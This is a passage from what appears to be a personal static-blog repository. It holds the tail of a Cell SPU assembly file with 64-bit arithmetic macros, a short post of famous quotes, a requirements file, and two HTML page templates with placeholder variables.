;\ 118 | shufb alu_reg_v1, alu_reg_t3, alu_reg_t3, alu_reg_mul_m1 ;\ 119 | shufb alu_reg_v2, alu_reg_t0, alu_reg_t3, alu_reg_mul_m2 ;\ 120 | shufb alu_reg_v3, alu_reg_t1, alu_reg_t1, alu_reg_mul_m3 ;\ 121 | shufb alu_reg_v4, alu_reg_t2, alu_reg_t2, alu_reg_mul_m3 ;\ 122 | shufb alu_reg_v5, alu_reg_t1, alu_reg_t1, alu_reg_mul_m4 ;\ 123 | shufb alu_reg_v6, alu_reg_t2, alu_reg_t2, alu_reg_mul_m4 ;\ 124 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v1) ;\ 125 | add_128(alu_reg_v2, alu_reg_v2, alu_reg_v3) ;\ 126 | add_128(alu_reg_v4, alu_reg_v4, alu_reg_v5) ;\ 127 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v2) ;\ 128 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v4) ;\ 129 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v6) ;\ 130 | shufb ret, alu_reg_v0, alu_reg_v0, alu_reg_se64 ; 131 | 132 | // Functions 133 | 134 | .global alu_constants_init 135 | .type alu_constants_init, @function 136 | alu_constants_init: 137 | ila alu_reg_t0, alu_endian 138 | lqd alu_reg_se32, 0x00(alu_reg_t0) 139 | lqd alu_reg_se64, 0x10(alu_reg_t0) 140 | lqd alu_reg_se128, 0x20(alu_reg_t0) 141 | ila alu_reg_t0, alu_wswap 142 | lqd alu_reg_mul_lhs, 0x00(alu_reg_t0) 143 | lqd alu_reg_mul_rhs, 0x10(alu_reg_t0) 144 | ila alu_reg_t0, alu_mul64_constants 145 | lqd alu_reg_mul_m0, 0x00(alu_reg_t0) 146 | lqd alu_reg_mul_m1, 0x10(alu_reg_t0) 147 | lqd alu_reg_mul_m2, 0x20(alu_reg_t0) 148 | lqd alu_reg_mul_m3, 0x30(alu_reg_t0) 149 | lqd alu_reg_mul_m4, 0x40(alu_reg_t0) 150 | ila alu_reg_t0, alu_add64_constants 151 | lqd alu_reg_add_m64, 0x00(alu_reg_t0) 152 | bi $lr 153 | -------------------------------------------------------------------------------- /posts/2024-04-28-quotes/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: live 3 | date: 2024-04-28 4 | title: Quotes 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | "Wir müssen wissen. Wir werden wissen." — David Hilbert 9 | 10 | "Everyone who confuses correlation with causation eventually ends up dead." 
— Alan Cooper 11 | 12 | "I like offending people, because I think the people who get offended should be offended." — Linus Torvalds 13 | 14 | "The less confident you are, the more serious you have to act." — Tara Ploughman 15 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | markdown==3.3.3 2 | pygments==2.15.0 3 | -------------------------------------------------------------------------------- /templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Blog 7 | 8 | 9 | 10 | 37 | 38 | 39 |
40 | 47 |

Blog

48 |
49 |
50 | $posts 51 |
52 |
53 | 59 | 60 | 61 | -------------------------------------------------------------------------------- /templates/post.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | $title 7 | 8 | 9 | 10 | 50 | 51 | 52 |
53 | 60 | < Other articles 61 |
62 |
63 |

$title

64 |

65 | Author$author 68 | Date$date 71 |

72 | $content 73 |
74 |
75 | 81 | 82 | 83 | --------------------------------------------------------------------------------